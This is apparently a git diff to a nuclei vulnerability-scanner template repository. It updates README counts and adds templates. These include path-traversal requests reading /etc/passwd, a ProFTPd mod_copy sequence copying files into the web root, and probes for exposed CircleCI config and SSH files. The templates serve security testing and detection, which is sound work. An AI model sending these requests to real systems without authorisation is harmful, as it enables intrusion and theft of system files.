diff --git a/README.md b/README.md index 37d784efe8..1ed2f0d10a 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 61 | technologies | 50 | misconfiguration | 54 | +| cves | 237 | vulnerabilities | 105 | exposed-panels | 104 | +| exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 712 files**. +**75 directories, 716 files**. diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index aa427af7be..68b9e4ba42 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -9,6 +9,7 @@ requests: - raw: - | GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml new file mode 100644 index 0000000000..8c9faa4123 --- /dev/null +++ b/cves/2015/CVE-2015-3306.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-3306 + +info: + name: ProFTPd RCE + author: pd-team + severity: high + reference: https://github.com/t0kx/exploit-CVE-2015-3306 + tags: cve,cve2015,ftp,rce,network + +network: + - inputs: + - data: "site cpfr /proc/self/cmdline\r\n" + read: 1024 + - data: "site cpto /tmp/.{{randstr}}\r\n" + read: 1024 + - data: "site cpfr /tmp/.{{randstr}}\r\n" + read: 1024 + - data: "site cpto /var/www/html/{{randstr}}\r\n" + host: + - "{{Hostname}}:21" + + read-size: 1024 + matchers: + - type: word + words: + - "Copy successful" + part: raw \ No newline at end of file diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml new file mode 100644 index 0000000000..59a103811e --- /dev/null +++ b/cves/2018/CVE-2018-18778.yaml @@ -0,0 +1,24 @@ +id: CVE-2018-18778 + +info: + name: mini_httpd Path Traversal + author: dhiyaneshDK + severity: high + reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + tags: cve,cve2018,lfi +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + Content-Length: 4 + + unsafe: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 27c0bf4a94..8a92db1344 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -33,6 +33,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Upgrade-Insecure-Requests: 1 + req-condition: true matchers-condition: and matchers: - type: dsl diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml index 771b21408a..a8cfb6d388 100644 --- a/exposed-panels/identityguard-selfservice-entrust.yaml +++ b/exposed-panels/identityguard-selfservice-entrust.yaml @@ -11,6 +11,7 @@ requests: - "{{BaseURL}}/IdentityGuardSelfService/" - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico" + req-condition: true redirects: true max-redirects: 2 matchers: diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml new file mode 100644 index 0000000000..294bb13505 --- /dev/null +++ b/exposures/configs/circleci-config.yaml @@ -0,0 +1,24 @@ +id: circleci-config + +info: + name: circleci config.yml exposure + author: geeknik + severity: low + reference: https://circleci.com/docs/2.0/sample-config/ + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/config.yml" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "jobs:") == true' + + - type: status + status: + - 200 diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml new file mode 100644 index 0000000000..2d6eb7e18a --- /dev/null +++ b/exposures/configs/circleci-ssh-config.yaml @@ -0,0 +1,26 @@ +id: circleci-ssh-config + +info: + name: circleci ssh-config exposure + author: geeknik + severity: low + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/ssh-config" + + matchers-condition: and + matchers: + - type: word + words: + - "Host" + - "HostName" + - "IdentityFile" + condition: and + + - type: status + status: + - 200 diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 1a2db42b20..3c3c4a7e28 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -46,8 +46,8 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 + req-condition: true matchers: - type: dsl - name: iis-scan dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index 33f999e808..1e10bad487 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -19,6 +19,7 @@ requests: GET /testing-put.txt HTTP/1.1 Content-Type: text/plain + req-condition: true matchers: - type: dsl name: multi-req